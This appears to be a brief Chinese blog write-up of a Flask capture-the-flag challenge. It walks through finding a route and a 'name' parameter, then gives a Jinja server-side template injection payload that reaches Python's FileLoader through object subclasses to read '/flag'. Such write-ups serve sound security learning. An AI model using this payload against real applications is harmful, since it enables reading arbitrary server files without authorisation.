GenShin-Flask

GenShi

打开题目环境

image-20231029215129455

发现让我们寻找有用信息,发现在网络里找到了路由

image-20231029215226334

输入路由,发现让我们传入name参数

image-20231029215301379

传参后发现可能存在ssti注入

image-20231029215357600

构造payload,用Fileloader模块

1
?name={%print("".__class__.__base__.__subclasses__()[99]["get_data"](0,"/flag"))%}

image-20231029215931785

#web
GenShin-Flask
http://www.qetx.top/posts/2401/
作者
Qetx.Jul.27
发布于
2023年10月29日
许可协议